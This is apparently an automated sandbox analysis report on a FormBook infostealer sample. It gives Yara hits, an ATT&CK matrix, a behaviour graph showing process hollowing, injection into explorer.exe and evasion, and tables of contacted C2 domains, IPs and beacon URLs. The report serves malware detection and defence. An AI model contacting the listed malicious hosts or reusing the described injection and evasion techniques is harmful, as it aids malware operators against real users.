          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.8tvMmyxveyzFcnJ.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000006.00000002.4141366009.0000000000AB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4141417095.0000000000AE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1701635552.0000000003B39000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.4140775395.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.1754363752.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Shared Modules          		1
          DLL Side-Loading          		512
          Process Injection          		1
          Masquerading          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          Abuse Elevation Control Mechanism          		11
          Disable or Modify Tools          		LSASS Memory231
          Security Software Discovery          		Remote Desktop ProtocolData from Removable Media2
          Ingress Tool Transfer          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
          DLL Side-Loading          		41
          Virtualization/Sandbox Evasion          		Security Account Manager2
          Process Discovery          		SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook512
          Process Injection          		NTDS41
          Virtualization/Sandbox Evasion          		Distributed Component Object ModelInput Capture12
          Application Layer Protocol          		Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Deobfuscate/Decode Files or Information          		LSA Secrets1
          Application Window Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Abuse Elevation Control Mechanism          		Cached Domain Credentials214
          System Information Discovery          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Obfuscated Files or Information          		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
          Software Packing          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Timestomp          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
          DLL Side-Loading          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1470721 Sample: 8tvMmyxveyzFcnJ.exe Startdate: 10/07/2024 Architecture: WINDOWS Score: 100 35 www.fondsa.xyz 2->35 37 www.thecollisionmagazine.com 2->37 39 12 other IPs or domains 2->39 47 Snort IDS alert for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 55 9 other signatures 2->55 11 8tvMmyxveyzFcnJ.exe 3 2->11         started        signatures3 53 Performs DNS queries to domains with low reputation 35->53 process4 file5 33 C:\Users\user\...\8tvMmyxveyzFcnJ.exe.log, ASCII 11->33 dropped 67 Tries to detect virtualization through RDTSC time measurements 11->67 69 Injects a PE file into a foreign processes 11->69 71 Switches to a custom stack to bypass stack traces 11->71 15 8tvMmyxveyzFcnJ.exe 11->15         started        18 8tvMmyxveyzFcnJ.exe 11->18         started        signatures6 process7 signatures8 73 Modifies the context of a thread in another process (thread injection) 15->73 75 Maps a DLL or memory area into another process 15->75 77 Sample uses process hollowing technique 15->77 79 2 other signatures 15->79 20 explorer.exe 68 1 15->20 injected process9 dnsIp10 41 www.at89v2.com 103.224.212.213, 50631, 80 TRELLIAN-AS-APTrellianPtyLimitedAU Australia 20->41 43 www.291van.fun 188.114.97.3, 49743, 80 CLOUDFLARENETUS European Union 20->43 45 3.64.163.50, 50630, 80 AMAZON-02US United States 20->45 57 Uses netsh to modify the Windows network and firewall settings 20->57 24 netsh.exe 20->24         started        27 autofmt.exe 20->27         started        signatures11 process12 signatures13 59 Modifies the context of a thread in another process (thread injection) 24->59 61 Maps a DLL or memory area into another process 24->61 63 Tries to detect virtualization through RDTSC time measurements 24->63 65 Switches to a custom stack to bypass stack traces 24->65 29 cmd.exe 1 24->29         started        process14 process15 31 conhost.exe 29->31         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          8tvMmyxveyzFcnJ.exe53%ReversingLabsByteCode-MSIL.Trojan.Taskun
          8tvMmyxveyzFcnJ.exe49%VirustotalBrowse
          8tvMmyxveyzFcnJ.exe100%Joe Sandbox ML

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          www.at89v2.com0%VirustotalBrowse
          fondsa.xyz2%VirustotalBrowse
          sainikshiksha.com0%VirustotalBrowse
          www.291van.fun2%VirustotalBrowse
          ext-sq.squarespace.com0%VirustotalBrowse
          www.sainikshiksha.com0%VirustotalBrowse
          www.tatesfluffyfrenchies.com0%VirustotalBrowse
          www.thecollisionmagazine.com0%VirustotalBrowse
          www.motolimod.com0%VirustotalBrowse
          www.ajansyapai.net0%VirustotalBrowse
          www.basedawgz.live0%VirustotalBrowse
          www.huttonsidel.online0%VirustotalBrowse
          www.llngx.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV0%URL Reputationsafe
          https://api.msn.com:443/v1/news/Feed/Windows?0%URL Reputationsafe
          http://www.fontbureau.com/designers0%URL Reputationsafe
          https://excel.office.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings0%URL Reputationsafe
          https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.fontbureau.com/designers/frere-user.html0%URL Reputationsafe
          https://android.notify.windows.com/iOS0%URL Reputationsafe
          http://www.fontbureau.com/designersG0%URL Reputationsafe
          http://www.fontbureau.com/designers/?0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.fontbureau.com/designers?0%URL Reputationsafe
          https://powerpoint.office.comcember0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://schemas.micro0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew0%URL Reputationsafe
          http://www.fonts.com0%URL Reputationsafe
          http://www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUh0%Avira URL Cloudsafe
          http://www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUh0%Avira URL Cloudsafe
          http://www.ajansyapai.netReferer:0%Avira URL Cloudsafe
          https://aka.ms/odirmr0%Avira URL Cloudsafe
          http://www.huttonsidel.online0%Avira URL Cloudsafe
          http://www.huttonsidel.online0%VirustotalBrowse
          https://aka.ms/odirmr0%VirustotalBrowse
          http://www.bjcysadz.xyz/mc10/0%Avira URL Cloudsafe
          http://www.ajansyapai.net0%Avira URL Cloudsafe
          http://www.ajansyapai.net0%VirustotalBrowse
          http://www.huttonsidel.online/mc10/1%VirustotalBrowse
          http://www.motolimod.com0%Avira URL Cloudsafe
          http://www.zaki-argan.com0%Avira URL Cloudsafe
          http://www.huttonsidel.online/mc10/0%Avira URL Cloudsafe
          http://www.bjcysadz.xyz/mc10/1%VirustotalBrowse
          http://www.ajansyapai.net/mc10/0%Avira URL Cloudsafe
          http://www.fondsa.xyzReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we0%Avira URL Cloudsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%Avira URL Cloudsafe
          http://www.motolimod.com0%VirustotalBrowse
          http://www.ajansyapai.net/mc10/1%VirustotalBrowse
          http://www.shophansler.comReferer:0%Avira URL Cloudsafe
          http://www.zaki-argan.com0%VirustotalBrowse
          http://www.at89v2.com/mc10/www.sainikshiksha.com0%Avira URL Cloudsafe
          https://simpleflying.com/how-do-you-become-an-air-traffic-controller/0%VirustotalBrowse
          http://www.sainikshiksha.com/mc10/0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%Avira URL Cloudsafe
          http://www.kurainu.xyz0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%Avira URL Cloudsafe
          http://www.dealerxai.com/mc10/www.bjcysadz.xyz0%Avira URL Cloudsafe
          http://www.motolimod.com/mc10/www.at89v2.com0%Avira URL Cloudsafe
          http://www.kurainu.xyz0%VirustotalBrowse
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark0%VirustotalBrowse
          https://wns.windows.com/L0%Avira URL Cloudsafe
          http://www.sainikshiksha.com/mc10/1%VirustotalBrowse
          http://www.291van.fun0%Avira URL Cloudsafe
          https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg0%VirustotalBrowse
          http://www.fondsa.xyz0%Avira URL Cloudsafe
          http://www.llngx.com/mc10/www.ajansyapai.net0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY0%VirustotalBrowse
          http://www.291van.fun2%VirustotalBrowse
          https://word.office.com0%Avira URL Cloudsafe
          http://www.sainikshiksha.com/mc10/www.fondsa.xyz0%Avira URL Cloudsafe
          http://www.ajansyapai.net/mc10/www.tatesfluffyfrenchies.com0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu0%Avira URL Cloudsafe
          http://www.zaki-argan.comReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win0%Avira URL Cloudsafe
          http://www.tatesfluffyfrenchies.com/mc10/100%Avira URL Cloudphishing
          http://schemas.micr0%Avira URL Cloudsafe
          http://www.thecollisionmagazine.com/mc10/0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-0%Avira URL Cloudsafe
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu0%Avira URL Cloudsafe
          http://www.dealerxai.com0%Avira URL Cloudsafe
          http://www.shophansler.com/mc10/:100%Avira URL Cloudphishing
          https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark0%Avira URL Cloudsafe
          http://www.motolimod.com/mc10/0%Avira URL Cloudsafe
          http://www.sainikshiksha.comReferer:0%Avira URL Cloudsafe
          https://www.rd.com/list/polite-habits-campers-dislike/0%Avira URL Cloudsafe
          http://www.tatesfluffyfrenchies.com/mc10/www.dealerxai.com100%Avira URL Cloudphishing
          http://www.thecollisionmagazine.comReferer:0%Avira URL Cloudsafe
          https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img0%Avira URL Cloudsafe
          http://www.basedawgz.liveReferer:0%Avira URL Cloudsafe
          https://outlook.com_0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at0%Avira URL Cloudsafe
          https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe0%Avira URL Cloudsafe
          http://schemas.mi0%Avira URL Cloudsafe
          http://www.zaki-argan.com/mc10/0%Avira URL Cloudsafe
          http://www.huttonsidel.onlineReferer:0%Avira URL Cloudsafe
          https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl0%Avira URL Cloudsafe
          http://www.at89v2.com0%Avira URL Cloudsafe
          http://www.motolimod.comReferer:0%Avira URL Cloudsafe
          http://www.kurainu.xyzReferer:0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.at89v2.com
          		103.224.212.213
          		truetrueunknown
          fondsa.xyz
          		3.33.130.190
          		truetrueunknown
          sainikshiksha.com
          		103.191.209.34
          		truetrueunknown
          www.291van.fun
          		188.114.97.3
          		truetrueunknown
          ext-sq.squarespace.com
          		198.185.159.144
          		truetrueunknown
          www.sainikshiksha.com
          		unknown
          		unknowntrueunknown
          www.llngx.com
          		unknown
          		unknowntrueunknown
          www.tatesfluffyfrenchies.com
          		unknown
          		unknowntrueunknown
          www.fondsa.xyz
          		unknown
          		unknowntrue
            		unknown
            www.basedawgz.live
            		unknown
            		unknowntrueunknown
            www.motolimod.com
            		unknown
            		unknowntrueunknown
            www.huttonsidel.online
            		unknown
            		unknowntrueunknown
            www.thecollisionmagazine.com
            		unknown
            		unknowntrueunknown
            www.ajansyapai.net
            		unknown
            		unknowntrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://www.motolimod.com/mc10/?M6=vFB2baQv3F/rJ4Poxnbh3E5xW9PPAAbphga1xIFZj8yJGRkxzOANKPapIG+pOmwhUo5D&sZ=Ynzp6xUhtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.at89v2.com/mc10/?M6=+PshiMmsD3s2EuJ9KF3baeU+rJnvgbutDGTUYWD/T/xNi6HtTgrR7YeDwlLM6QRR03T9&sZ=Ynzp6xUhtrue
            • Avira URL Cloud: safe
            		unknown
            http://www.291van.fun/mc10/?M6=0jqVw3fXhgUe9S01oU54GSyQct+tyOMGPM4Q+l1hxxFHWjnqq7dqR8wNeV12RES6q9dV&sZ=Ynzp6xUhtrue
            • Avira URL Cloud: safe
            		unknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://aka.ms/odirmrexplorer.exe, 00000004.00000000.1703761960.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000079FB000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.huttonsidel.onlineexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.ajansyapai.netReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DVexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://api.msn.com:443/v1/news/Feed/Windows?explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3114554074.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4146493757.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1705502686.00000000097D4000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.ajansyapai.netexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.bjcysadz.xyz/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.huttonsidel.online/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.motolimod.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.zaki-argan.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.ajansyapai.net/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.fondsa.xyzReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.fontbureau.com/designers8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://excel.office.comexplorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-weexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://simpleflying.com/how-do-you-become-an-air-traffic-controller/explorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.shophansler.comReferer:explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.sajatypeworks.com8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.founder.com.cn/cn/cThe8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.at89v2.com/mc10/www.sainikshiksha.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.sainikshiksha.com/mc10/explorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUYexplorer.exe, 00000004.00000002.4143507586.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.kurainu.xyzexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-darkexplorer.exe, 00000004.00000000.1703761960.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4143507586.00000000078AD000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.dealerxai.com/mc10/www.bjcysadz.xyzexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.galapagosdesign.com/DPlease8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exeexplorer.exe, 00000004.00000000.1707756779.000000000C893000.00000004.00000001.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.urwpp.deDPlease8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.zhongyicts.com.cn8tvMmyxveyzFcnJ.exe, 00000000.00000002.1703711818.0000000006D22000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            		unknown
            http://www.motolimod.com/mc10/www.at89v2.comexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svgexplorer.exe, 00000004.00000000.1703761960.0000000007900000.00000004.00000001.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            https://wns.windows.com/Lexplorer.exe, 00000004.00000000.1707756779.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000002.4153126684.000000000C557000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.291van.funexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • 2%, Virustotal, Browse
            • Avira URL Cloud: safe
            		unknown
            http://www.fondsa.xyzexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://www.llngx.com/mc10/www.ajansyapai.netexplorer.exe, 00000004.00000002.4148743202.00000000098A8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3463983042.000000000991A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000003.3110883714.000000000991A000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            https://word.office.comexplorer.exe, 00000004.00000002.4153126684.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.1707756779.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
